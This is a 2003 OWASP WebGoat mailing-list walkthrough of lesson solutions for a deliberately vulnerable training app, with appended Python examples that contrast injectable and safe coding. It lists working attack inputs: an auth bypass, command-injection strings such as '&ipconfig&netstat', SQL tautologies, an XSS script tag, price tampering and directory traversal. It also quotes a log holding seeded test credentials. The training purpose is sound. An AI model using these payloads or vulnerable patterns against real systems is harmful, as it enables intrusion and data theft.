[OWASP-WEBGOAT] WebGoat Walkthru? (May be a spoiler, so if you haven't completed the lessons, you may not want to look at it)

Jeremy Junginger jj at act.com
Wed Nov 19 13:32:30 EST 2003


Hey guys, this is my first post to the group.  I have been getting familiar
with WebGoat and am about to play with the challenges, but I wanted to make
sure I'm on the right track before I continue.  Thanks!

TOOLS USED:
PenProxy (HTTP Proxy that allows modification of many fields)
Achilles (Another HTTP Proxy that was suggested)
HTTrack (Tool for spidering websites)
FormScalpel (Form manipulation and more)

WALK-THRU?!?:

HTTP BASICS:  I looked at this one for a couple of hours before I decided it is just a tutorial on HTTP.
EXPLOIT: N/A (I may have missed something here)

FAIL OPEN AUTHENTICATION:  This one took forever... the hints led me to removing the password parameter, and "VIEW SOURCE" gave me the author's name "jeff", so I tried jeff with "jeff" first just to see if it worked, and voila. But more interesting is the fact that if you omit the password parameter completely and supply a valid username (in this case, "jeff") it authenticates anyway.
EXPLOIT:
http://127.0.0.1:8080/WebGoat/attack?Username=jeff
or
http://127.0.0.1:8080/WebGoat/attack?Username=jeff&Password=jeff

HTML CLUES:  This was pretty much a gimme.  
<snip>
    FIXME admin:adminpw
</snip>
EXPLOIT:
http://127.0.0.1:8080/WebGoat/attack?Username=admin&Password=adminpw
which also yields:
http://127.0.0.1:8080/WebGoat/attack?Username=jblow&Password=passwd1
which also lets you log in.

PARAMETER INJECTION:  This one was pretty funny.  It reminded me of the directory traversal/Unicode (à la NIMDA/CR/CR2) exploits.  The &, &&, |, and || can be used to run additional commands that are available in the shell.
EXPLOIT (examples):
http://127.0.0.1:8080/WebGoat/attack?dir=&ipconfig&netstat
or enter the following in the form:
&ipconfig&netstat&ping 127.0.0.1

UNCHECKED EMAIL:  I'm not sure I get this one.  I see that you can send malicious HTML emails, but didn't find much else.  I used:
EXPLOIT?:
TO: test@test.xom
MESSAGE: <A href="http://www.playboy.com/">http://www.google.com</A>

SQL INJECTION:  This is a subject I am still pretty new at, but I took a look at "SQL Injection" by Kevin Spett of SPI LABS, which led me to try inserting an "always true" statement (1=1):
EXPLOIT:
Enter an account number:' or 1=1
or
Enter an account number:' or 0=0
:)

THREAD SAFETY:  I used the hints, and saw that if you open the two browsers (and click fast enough) one user's account gets sent to both user IDs.  Bad stuff there.  I wouldn't want to see that in production...heheh

WEAK AUTHENTICATION COOKIE:  This one was neat, because it had a little cryptogram-type puzzle (jeff/jeff creates the cookie ggfkggfk whereas dave/dave creates the cookie fwbefwbe; they're reversed and incremented by 1 letter).  This didn't actually buy us anything as far as I can tell, except the 'AuthCookie'.  I logged in with jeff/jeff and upon logging out, I noticed that the cookie had an 'AuthCookie=ggfkggfk', so I put it in the Cookie field of PenProxy and it worked:
EXPLOIT:
Using PenProxy, I added 'AuthCookie=ggfkggfk;' to the Cookie field
BUT I FOUND THIS TO BE INTERESTING:  I stopped Tomcat (Java crash) and reconnected to WebGoat, and look what Tomcat threw out...this was actually kind of funny...
<snip>
Successful connection to null
http8080-Processor4 DROP TABLE user_data
http8080-Processor4 CREATE TABLE user_data (userid varchar(5) not null primary key,first_name varchar(20),last_name varchar(20),cc_number varchar(30),cc_type varchar(10),)
http8080-Processor4 INSERT INTO user_data VALUES ('101','Joe','Blow','987654321','VISA')
http8080-Processor4 INSERT INTO user_data VALUES ('101','Joe','Blow','222200001111','MC')
http8080-Processor4 INSERT INTO user_data VALUES ('102','John','Doe','222200002222','MC')
http8080-Processor4 INSERT INTO user_data VALUES ('102','John','Doe','222200002222','AMEX')
http8080-Processor4 INSERT INTO user_data VALUES ('103','Jane','Plane','123456789','MC')
http8080-Processor4 INSERT INTO user_data VALUES ('103','Jane','Plane','333300003333','AMEX')
http8080-Processor4 DROP TABLE user_system_data
http8080-Processor4 CREATE TABLE user_system_data (userid varchar(5) not null primary key,user_name varchar(12),password varchar(10),cookie varchar(30),)
http8080-Processor4 INSERT INTO user_system_data VALUES ('101','jblow','passwd1', '')
http8080-Processor4 INSERT INTO user_system_data VALUES ('102','jdoe','passwd2', '')
http8080-Processor4 INSERT INTO user_system_data VALUES ('103','jplane','passwd3', '')
http8080-Processor4 INSERT INTO user_system_data VALUES ('104','jeff','jeff', '')
http8080-Processor4 INSERT INTO user_system_data VALUES ('105','dave','dave', '')
http8080-Processor4 DROP TABLE product_system_data
http8080-Processor4 CREATE TABLE product_system_data (productid varchar(6) not null primary key,product_name varchar(20),price varchar(10),)
http8080-Processor4 INSERT INTO product_system_data VALUES ('32226','Dog Bone','$1.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('35632','DVD Player','$214.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('24569','60 GB Hard Drive','$149.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('56970','80 GB Hard Drive','$179.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('14365','56 inch HDTV','$6999.99')
http8080-Processor4 DROP TABLE messages
http8080-Processor4 CREATE TABLE messages (num int not null primary key,title varchar(50),message varchar(1000),)
Success: creating tables.
Successfully refreshed the database.
Wed Nov 19 11:05:08 GMT-07:00 2003 | x.x.x:x.x.x.x | WelcomeScreen | [Username=jeff,Password=jeff]
</snip>
(Is that cheating?  I think it may be)

DATABASE XSS:  I just tried standard JavaScript "alert" messages, and found that if you put the following in the message field and view it, it runs the code.
EXPLOIT:
Message: <script language="javascript" type="text/javascript">alert("Put Malware Here");</script>
(Then click on message to view)

HIDDEN FIELD TAMPERING:  I think I'm missing something here.  I saw that you
can just pass the price parameter as any number you want, so I just modified
the price parameter and got a television for .01, what a bargain!
EXPLOIT:
http://10.40.32.111:8080/WebGoat/attack?Price=.01

WEAK ACCESS CONTROL (SHOULD BE DIRECTORY TRAVERSAL?): All I could find on
this one was that it allowed directory traversal.  Pretty much trial and
error on this one.  Anyone find this another way?
EXPLOIT:
Filename:../
or
Filename:../../
grants access to TOP SECRET stuff.

CHALLENGES:  I am getting ready to work on these.  But I wanted to make sure
I haven't overlooked any obvious stuff in the above exercises.  Thanks for
your input on this, and have a great day!

-Jeremy
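Editor's added example for the PARAMETER INJECTION lesson above (not code from the post or from WebGoat): the lesson's command is Windows-specific (a directory listing followed by ipconfig/netstat), so this reconstruction uses `echo`, which both cmd.exe and POSIX sh provide, and `&&`, which both shells treat as a command separator. The `run_vulnerable`/`run_argv`/`validate_dir_name` names and the allow-list pattern are this example's own assumptions.

```python
import re
import subprocess

# Constructed input in the spirit of the post's "&ipconfig&netstat": one
# legitimate value followed by a separator and a second command.
INJECTED_INPUT = "x && echo INJECTED"

# Hypothetical allow-list for a directory-name parameter; the real lesson's
# validation (if any) is not shown on the page.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]+")


def run_vulnerable(user_input: str) -> str:
    """Builds one command line and hands it to the shell, so every shell
    metacharacter in user_input (&, &&, |, ||) starts an extra command."""
    result = subprocess.run(
        "echo " + user_input, shell=True, capture_output=True, text=True
    )
    return result.stdout


def run_argv(user_input: str) -> str:
    """Passes the value as a single argv element. No shell parses it, so
    '&&' and friends are ordinary characters printed back verbatim."""
    result = subprocess.run(["echo", user_input], capture_output=True, text=True)
    return result.stdout


def validate_dir_name(user_input: str) -> bool:
    """Allow-list check to apply before any command is built at all."""
    return SAFE_NAME.fullmatch(user_input) is not None


if __name__ == "__main__":
    print("shell=True :", run_vulnerable(INJECTED_INPUT).splitlines())
    print("argv list  :", run_argv(INJECTED_INPUT).splitlines())
    print("allow-list :", validate_dir_name("&ipconfig&netstat"))
```

With `shell=True` the second `echo` runs as its own command; with the argv list the whole string is one argument. The allow-list rejects the post's payload before a command is ever constructed, which is the check to prefer over trying to strip individual separators.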

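Editor's added example for the SQL INJECTION lesson above (not code from the post or from WebGoat): the `user_data` rows are transcribed from the Tomcat startup log quoted in the post, loaded into an in-memory SQLite table. The lesson's actual query string is not on the page; this reconstruction assumes the account number is spliced into a single-quoted literal, so the tautology has to close the quote it opens (`' or '1'='1`, or `' or 1=1 --` using a comment), whereas the post shows the bare `' or 1=1`. Function names are this example's own.

```python
import sqlite3

# Rows from the Tomcat log quoted in the post. The logged CREATE TABLE declares
# userid a primary key, yet the logged INSERTs reuse 101, 102 and 103, so the
# constraint is omitted here so that every row loads.
USER_DATA = [
    ("101", "Joe", "Blow", "987654321", "VISA"),
    ("101", "Joe", "Blow", "222200001111", "MC"),
    ("102", "John", "Doe", "222200002222", "MC"),
    ("102", "John", "Doe", "222200002222", "AMEX"),
    ("103", "Jane", "Plane", "123456789", "MC"),
    ("103", "Jane", "Plane", "333300003333", "AMEX"),
]


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user_data (userid varchar(5), first_name varchar(20), "
        "last_name varchar(20), cc_number varchar(30), cc_type varchar(10))"
    )
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?, ?, ?)", USER_DATA)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, account: str) -> list:
    """String concatenation (assumed form of the lesson's query): the account
    number becomes SQL text, so a quote in it rewrites the WHERE clause."""
    sql = "SELECT * FROM user_data WHERE userid = '" + account + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, account: str) -> list:
    """Bound parameter: the account number is data and is never parsed as SQL,
    so the same payload simply matches no row."""
    return conn.execute(
        "SELECT * FROM user_data WHERE userid = ?", (account,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    for payload in ("101", "' or '1'='1", "' or 1=1 --"):
        print(repr(payload), "vulnerable:", len(lookup_vulnerable(db, payload)),
              "safe:", len(lookup_safe(db, payload)))
```

A real lookup for `101` returns that user's two cards either way; the tautology returns every card in the table through the concatenated query and nothing through the parameterised one.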
  


